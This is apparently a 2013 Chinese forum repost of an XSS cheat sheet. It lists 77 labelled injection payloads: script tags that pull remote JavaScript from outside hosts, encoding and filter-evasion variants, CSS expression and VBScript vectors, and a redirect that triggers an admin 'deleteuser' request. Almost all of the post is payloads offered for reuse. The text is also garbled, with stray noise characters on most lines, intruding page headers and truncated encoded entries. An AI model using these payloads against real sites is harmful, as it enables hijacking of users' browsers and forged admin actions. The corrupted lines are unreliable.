貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。2 V5 M3 x; ?/ q1 V
(1)普通的XSS JavaScript注入
* M4 l6 K5 _4 E% Q: q, _8 a# A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 R, X: o* r j$ @
(2)IMG标签XSS使用JavaScript命令
6 Y1 O; m* E* z7 ?8 {2 B7 ^1 e. I<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># |7 V4 m& h+ H" E7 S9 {( _
(3)IMG标签无分号无引号
* P1 V9 n# J+ j<IMG SRC=javascript:alert(‘XSS’)>
: {2 k( ]. `( ^ @- J: v& |! M A& V(4)IMG标签大小写不敏感
2 y. h$ }8 ]4 U% U; c<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 i _ G% ?+ @1 n
(5)HTML编码(必须有分号)3 B8 N, n: ?$ K; v, A( I
<IMG SRC=javascript:alert(“XSS”)>
8 ]8 X r0 I, W- |(6)修正缺陷IMG标签/ z4 O1 l2 K/ E: K4 W: i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; \5 B* N8 F( R! e( R3 n% r e
2 x m6 s( F6 m, U7 q: s
( }) ]7 ^# r/ u0 k' V" W( ^(7)formCharCode标签(计算器)- B9 N6 E+ G, x" t) m# R m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 _* c+ i5 T5 W- u+ b(8)UTF-8的Unicode编码(计算器)
# g0 K7 b5 `8 M3 e9 ^# @<IMG SRC=jav..省略..S')>3 J' U/ \* C1 S- Q& P* d# Q/ t2 y/ S+ I
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ X3 n/ ~$ q' [- Z9 A
<IMG SRC=jav..省略..S')>
/ E( r* g$ v8 o(10)十六进制编码也是没有分号(计算器)
" `* h& ^& c( P6 U0 X8 ]<IMG SRC=java..省略..XSS')>. x; s6 A% z1 I; w8 ]& y5 k7 I
(11)嵌入式标签,将Javascript分开2 T; p" g* j4 v6 t. L; N# E# A
<IMG SRC=”jav ascript:alert(‘XSS’);”>* S- M/ [: |9 Z& _
(12)嵌入式编码标签,将Javascript分开
3 [* G2 g; d9 ^8 n: t<IMG SRC=”jav ascript:alert(‘XSS’);”>
' P' K' a. K& B% h(13)嵌入式换行符6 [! `! f0 b" R' X; k) f/ R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" @2 h# t# x% z* k(14)嵌入式回车
% J- b: {5 w8 q2 d' f9 z<IMG SRC=”jav ascript:alert(‘XSS’);”>
% a* H9 E, o s5 ~6 u(15)嵌入式多行注入JavaScript,这是XSS极端的例子" M) C3 x; |& R2 r& S
<IMG SRC=”javascript:alert(‘XSS‘)”>
7 f+ {- x! @3 a$ E(16)解决限制字符(要求同页面)5 l: D, a" h( W8 D# f
<script>z=’document.’</script>6 K) v; o% ]! H' y! T! m
<script>z=z+’write(“‘</script>
8 L2 \: L2 @! m4 g' t; M2 S<script>z=z+’<script’</script>
+ ]. ? V$ x( c9 w<script>z=z+’ src=ht’</script>- E5 h2 s9 g" i
<script>z=z+’tp://ww’</script>
' X+ B4 B4 @" v! L, T7 ?<script>z=z+’w.shell’</script>
" \2 g" ] R* A* a<script>z=z+’.net/1.’</script>) T+ V3 b4 g, T4 u( h' @3 H$ G5 z
<script>z=z+’js></sc’</script>
6 X- l9 l! n5 [. Z2 G5 K<script>z=z+’ript>”)’</script>
% s, @) R) j8 W8 R$ E# {# D<script>eval_r(z)</script>) ?% b+ P, p4 }: n, X
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
; A; U. ^$ T7 R' Z# _$ whttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
) ^: M! f: c" v5 q" a2 G, Rperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 K0 d! \ @8 n$ y1 X
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, ~0 f- w8 ]7 W% G) h2 nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out I; `; x p5 N& c# I+ L( u
(19)Spaces和meta前的IMG标签4 Q) |) D9 f+ @& c6 R
<IMG SRC=” javascript:alert(‘XSS’);”>* |% E4 k8 y0 f8 m S- J
(20)Non-alpha-non-digit XSS
: q& I; B3 o1 D( m<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# g3 S5 T- N3 L$ e. s& B(21)Non-alpha-non-digit XSS to 2$ G6 e0 f5 d3 Z/ F. p8 g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 ~$ v3 H; M) u6 v0 x/ u) q- w G
(22)Non-alpha-non-digit XSS to 3
( }7 F3 j) ~9 V6 x( n1 g. \<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ n7 z* a) u7 S% _7 v+ H(23)双开括号
6 h, V' z$ V0 \+ _% e/ X<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 ?! Y" ^" }6 N" E1 H4 P
(24)无结束脚本标记(仅火狐等浏览器)# G, S$ `. {! P, Y7 Y% @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 A R6 X1 j0 Y, H$ H3 j(25)无结束脚本标记27 l3 T X/ P3 {$ F0 I
<SCRIPT SRC=//3w.org/XSS/xss.js>
: c0 U2 ]% m5 L(26)半开的HTML/JavaScript XSS
8 B6 ?9 y. L( J4 ~1 t( h1 X<IMG SRC=”javascript:alert(‘XSS’)”
6 s4 M8 u7 K* N2 e7 q2 _1 r1 O( K(27)双开角括号
/ v/ ^4 J' ^: [% v6 S<iframe src=http://3w.org/XSS.html <
0 |& z9 J; s8 Q) }1 T(28)无单引号 双引号 分号
( B% V& O' I! s+ c& X<SCRIPT>a=/XSS/
( H1 C9 D0 b6 r5 I# W0 falert(a.source)</SCRIPT>7 ^# j' _4 s" U1 |7 D
(29)换码过滤的JavaScript
l0 ~: d9 G: k% }8 X" ~6 K' m\”;alert(‘XSS’);/// j s6 ?7 U1 s% i
(30)结束Title标签2 e0 C, H5 a o$ g _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
" C7 I9 h& e6 ~! D3 r1 Y" `' ?( {(31)Input Image
: @) R. h5 w$ S4 x. f6 I<INPUT SRC=”javascript:alert(‘XSS’);”>
; ?) S/ q5 V ] I2 x(32)BODY Image
/ Y& y1 l5 }% O<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ M: p6 e P" N1 B( y0 x1 ?/ {' d(33)BODY标签, G6 P7 _( L: w6 y9 A; |
<BODY(‘XSS’)>* C" K: G1 I4 \0 K$ ?/ g
(34)IMG Dynsrc
/ j9 X, [7 _- m" c; P6 @<IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 F7 k5 r9 ~6 S: Z" t8 a" {% k(35)IMG Lowsrc1 C: h9 g! F! O+ K" ^3 v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>, j& Q0 f5 f6 t
(36)BGSOUND6 r: k7 F" L: D# E8 D5 R8 b2 K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 ~3 T% A7 J, E! Z( n(37)STYLE sheet
' f; _" M' {! y9 J6 X3 K+ q- @<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& N6 M( _9 t" O7 k( h" g! K$ g
(38)远程样式表' v! Z$ l4 K7 j. n) o
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: U5 ~0 g9 v( f3 O- o' {(39)List-style-image(列表式)
+ M0 {8 ^8 h% G<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 S# i. b; [% Q' R6 @
(40)IMG VBscript% b6 C0 G4 f- B8 x
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% F: {1 _0 d% w. u( s(41)META链接url: E9 M: V) k1 M' E
$ F3 L+ }( A/ r8 W0 b0 [. V7 ]! F" V4 @ a) n4 V% l4 h
<META HTTP-EQUIV=”refresh” CONTENT=”0;1 I/ g, P; @& b c, \ Q! e+ H
URL=http://;URL=javascript:alert(‘XSS’);”>3 D% L' Q- z) t1 N
(42)Iframe5 q/ l6 y2 p# V3 x
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>0 U" S5 S: F4 h4 W" I; B
(43)Frame
( E, P. f6 L9 p3 A4 g<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board9 f- O2 H& z1 @: V% _& M
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
1 S1 V" ^+ f% r, G7 a1 _(44)Table/ |3 @ m- c3 ~& D) H( O% C" Y) }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& }% ^' f! c( U
(45)TD+ K: J& M( [. c F* }" |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 k x+ P* I: d% l) \
(46)DIV background-image9 p& H3 k1 `! I
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" o$ K2 y4 M9 Q; f+ J(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
3 t2 O. T4 N/ X! }; |. W8 j8&13&12288&65279)
& [, ^# L% X3 ^% O1 W$ W% L! V A" \3 g<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) w5 m X$ ~, D8 j! h(48)DIV expression
6 H! `* l) r1 {' a H<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* t. B* E; W# O% ^3 w; `(49)STYLE属性分拆表达. ]" U" k, f6 ]; F) v- I: O" r
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
" S4 ?3 Q# N! c I1 z- G(50)匿名STYLE(组成:开角号和一个字母开头)3 {/ K9 |3 f+ i' b0 `- W: O
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 S# X! X$ I0 z+ ]( {% P y: |1 B
(51)STYLE background-image
4 i7 d2 U0 Q/ X- `& R+ Z# b; T' X<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
4 y# x) ]2 e/ {3 Z; ZCLASS=XSS></A>
+ i: M3 h5 P6 r% k7 a4 c q2 K(52)IMG STYLE方式
& _6 q, n. y# t6 F4 Cexppression(alert(“XSS”))’>
R. \) J, `) ]7 N& `% o; s(53)STYLE background: D; \: ^0 J6 h j( C" f% \- F
<STYLE><STYLE/ X; J* j' l* P$ v8 n
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>! K& U6 D+ K$ e" F
(54)BASE/ X, {% i( x7 S: @, U
<BASE HREF=”javascript:alert(‘XSS’);//”>
# H6 b, F9 _; l7 ?- J(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 o& _9 c$ O7 t- {
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
) G5 K C6 G2 {+ C5 v0 r(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 O( e; B: N) |6 r& e+ x4 C1 qa=”get”;( K- t( k4 S% ]) S3 R
b=”URL(\”";# }- ?1 F+ f" Y5 K
c=”javascript:”;
9 d, x6 S/ {: P6 n4 Y( Jd=”alert(‘XSS’);\”)”;! {: K/ ]6 Q# S% R3 S; z" B
eval_r(a+b+c+d);( n. I, t; n f% t' l+ Z$ s
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) K/ N. ]) d7 x* P5 W% X( j<HTML xmlns:xss>! M4 x/ w+ r6 c- N( D: `" S
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>3 j( E i* a5 u. D5 x
<xss:xss>XSS</xss:xss>$ R2 j7 }3 k$ k. O9 w/ S- i% T
</HTML>% u) p! o& E0 O7 e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ \! Y1 T0 ?! X* k; b8 \8 U0 T
<SCRIPT SRC=””></SCRIPT>% ~0 _& k# l5 V3 U9 A9 m
(59)IMG嵌入式命令,可执行任意命令
4 p( y. \! s, q2 V1 u. O! ]+ W<IMG SRC=”http://www.XXX.com/a.php?a=b”>
* v4 }) M. B& |; g+ D" Z$ E1 x(60)IMG嵌入式命令(a.jpg在同服务器)
- G g4 t, d9 U- n* kRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 f8 i% _( c2 t1 f(61)绕符号过滤1 D* ~" ~" k+ r9 U# a, g8 N
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 i" M) t) C) a0 ~8 s* i3 i
(62)
7 _/ `% x6 p w( {<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 G e$ e3 l5 g' W( A. O(63)) Q. y# C0 G' s
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>* _ y4 y2 v- g/ }0 U* w% Y6 j
(64)
7 i7 g' A/ n! o. j<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: e' e, }; w4 M1 I: T0 H Z4 V(65)! f7 W! _& W) _" C
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! _. h, A8 E& s5 o- E(66)12-7-1 T00LS - Powered by Discuz! Board0 c6 O. H. ~9 m4 r: e* h5 x7 y) E5 x
https://www.t00ls.net/viewthread ... table&tid=15267 4/61 V5 w4 U: s5 \' V/ f0 F; U. J
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>* T" H! p% O0 f M
(67)+ ?5 T( K# y; X% r5 O( G
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>, |$ l8 `" D: O0 b* `5 K! E$ ]+ L
</SCRIPT>
8 e j$ j) [! W" n1 b(68)URL绕行$ ?0 C( M6 \1 T6 f4 M, C* ^! a
<A HREF=”http://127.0.0.1/”>XSS</A>
! U4 j0 L$ @) X(69)URL编码- V- c: k3 v7 E& Z. b
<A HREF=”http://3w.org”>XSS</A>
& W% f) K! i: w$ O(70)IP十进制+ W/ I# A% h1 C$ S. p
<A HREF=”http://3232235521″>XSS</A>
3 e1 R% D) k3 w. {) o2 ?+ o# w+ ](71)IP十六进制
% [! K7 g$ j6 i1 w( E<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
9 ~4 Y% o, x8 W; J(72)IP八进制
: i4 R" O3 f0 h o* k( y<A HREF=”http://0300.0250.0000.0001″>XSS</A>
2 z: U7 z" Y5 z: y(73)混合编码
$ \% u6 l; b) r6 n+ L$ D<A HREF=”h4 Q5 j. h/ K3 G
tt p://6 6.000146.0×7.147/”">XSS</A>
& w$ d+ e4 h( Z0 i3 f% r* [(74)节省[http:]
3 L8 d3 P$ c/ [. H3 u<A HREF=”//www.google.com/”>XSS</A>; w u% Y6 f8 I; q6 s0 v6 z; F1 u7 _
(75)节省[www]
. u* J$ K3 H a+ b0 y; p) C<A HREF=”http://google.com/”>XSS</A>8 ^% ]2 W6 ?. q8 H' R$ ~* o
(76)绝对点绝对DNS
) ]0 K7 k) d0 g6 |<A HREF=”http://www.google.com./”>XSS</A>
# y% e o! O0 [9 k; B3 n(77)javascript链接
. y; S, B3 M! B9 c# t& x9 s<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
) \+ o7 e0 J* ?# ?( U6 K4 ?% X8 T0 A6 A
原文地址:http://fuzzexp.org/u/0day/?p=142 m, ]! L t- f
0 n: c i& t$ o' }6 r |
发表于 2013-4-19 19:22:37
收藏
支持
反对